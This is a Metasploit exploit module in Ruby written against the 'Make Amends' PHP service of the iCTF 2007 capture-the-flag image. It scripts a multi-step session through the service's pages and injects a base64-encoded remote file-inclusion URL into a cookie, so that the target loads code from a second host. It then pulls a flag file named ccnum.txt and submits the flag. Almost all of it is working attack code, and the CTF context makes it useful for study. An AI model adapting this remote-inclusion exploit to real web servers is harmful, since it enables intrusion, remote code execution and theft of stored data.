##
# $Id: php_eval.rb 14774 2012-02-21 01:42:17Z rapid7 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rubygems'
require 'ruby-debug'
require 'base64'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'make amends of ictf2007',
			'Description'    => %q{
				Exploit Make Amends service of ictf2007 image
			},
			'Author'         => [ 'egypt' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 14774 $',
			'References'     => [ ],
			'Privileged'     => false,
			'Platform'       => ['php'],
			'Arch'           => ARCH_PHP,
			'Payload'        =>
				{
					# max header length for Apache,
					# http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
					'Space'       => 8190,
					# max url length for some old versions of apache according to
					# http://www.boutell.com/newfaq/misc/urllength.html
					#'Space'       => 4000,
					'DisableNops' => true,
					'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					'Keys'        => ['php'],
				},
			'DisclosureDate' => 'Oct 13 2008',
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0
			))

		register_options(
			[
				OptString.new('URIPATH',   [ true,  "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
			], self.class)

	end

	def check
		uri = "http://169.254.236.101/~amends/amends.php";
		print_status("Checking uri #{uri}")
		response = send_request_raw({ 'uri' => uri})
		if response.code == 200
			return Exploit::CheckCode::Detected
		end
		print_error("Server responded with #{response.code}")
		return Exploit::CheckCode::Safe
	end

	def exploit
		# very short timeout because the request may never return if we're
		# sending a socket payload
		timeout = 0.01

		# 1. ----------- VISIT amends.php ---------------------------
		stub = "-l";
		emailaddr = Rex::Text.rand_text_alpha_upper(4)+"@a.com";
		params = "first=a&last=b&comment=c&price=$1.11&submit=submit";
		params = "first=a&last=b&comment-c&email=" + Rex::Text.uri_encode(emailaddr) + "&price="+Rex::Text.uri_encode("$1.11")+"&submit=submit";
		uri = "http://169.254.236.101/~amends/cgi-bin/amends.php?" + params;
		print_status("Sending request for: #{uri}")

		response = send_request_raw({
				'global' => true,
				'uri' => uri,
				'headers' => {
						'Connection' => 'close'
					}
			},timeout)
		sessionid = response.headers['Set-Cookie']
		print_status("session id: " + sessionid);
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		# 2. --------------- VISIT ltr.php -----------------------------
		uri = "http://169.254.236.101/~amends/cgi-bin/ltr.php?ltrfmt=pdf";
		print_status("Sending request for: #{uri}")

		response = send_request_raw({
				'global' => true,
				'uri' => uri,
				'headers' => {
						'Connection' => 'close',
						'Cookie' => sessionid
					}
			},timeout)
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end
		#print_error("server responded with #{response.headers['Cookie']}");
		#print_error("server responded with #{response.body}");
		arrMatch = response.body.scan(/CASE ID.*?\<td\>(.*?)\<\/td\>/);
		caseID = arrMatch[0][0];
		print_error("case ID is #{caseID}");
		print_error("emailaddr is #{emailaddr}");

		# 3. ----------------- visit settlement.php --------------------------

		uri = "http://169.254.236.101/~amends/cgi-bin/settlement.php";
		print_status("Sending request for: #{uri}")

		params = "email=" + Rex::Text.uri_encode(emailaddr) + "&caseid=" + Rex::Text.uri_encode(caseID) +"&submit=Login";
		print_status("data is #{params}")
		iLength = params.length;

		response = send_request_raw({
				'global' => true,
				'uri' => uri,
				'method' => 'POST',
				'headers' => {
						'Connection' => 'Keep-Alive',
						'Content-Length' => iLength.to_s(),
						'Content-Type' => 'application/x-www-form-urlencoded' #THIS ONE IS IMPORTANT! 
						# How do we find it out? Compare the TCPDUMP of real traces with the one generated by payload
					},
				'data' => params
			},timeout)
		sessionid = response.headers['Set-Cookie']
		print_error("SESSION is #{response.headers['Set-Cookie']}");
		print_error("settlement body is #{response.body}");


		# 4. -------------------- visit payoff.php ------------------------------
		uri = "http://169.254.236.101/~amends/cgi-bin/payoff.php";

		print_status("Sending request for: #{uri}");
		sessionid = sessionid + ";ltrfmt=" + Base64.encode64("http://169.254.236.111/ltr2.inc");

		response = send_request_raw({
				'global' => true,
				'uri' => uri,
				'headers' => {
						'Connection' => 'close',
						'Cookie' => sessionid
					}
			},timeout)
		print_error("response body is #{response.body}");
		print_error("SESSION is #{sessionid}");

		# 4. -------------------- visit ccnum.txt ------------------------------
		uri = "http://169.254.236.101/~amends/settlement/ccnum.txt";

		print_status("Sending request for: #{uri}");

		response = send_request_raw({
				'global' => true,
				'uri' => uri,
				'headers' => {
						'Connection' => 'close',
					}
			},timeout)
		print_error("response body is #{response.body}");

		arrMatch = response.body.scan(/FLG\S*/);
		ccnum = arrMatch[0];
#--------------------------------upload flag (5)-------------	
		uri = "http://169.254.236.101/forward.php?flag=#{ccnum}";
		datastore["RHOST"] = "169.254.236.101";
		print_status("Sending request for: #{uri}");

		response = send_request_raw({
				'global' => true,
				'uri' => uri,
				'headers' => {
						'Connection' => 'close',
					}
			},timeout)
		print_error("response body is #{response.body}");

		handler
	end
end
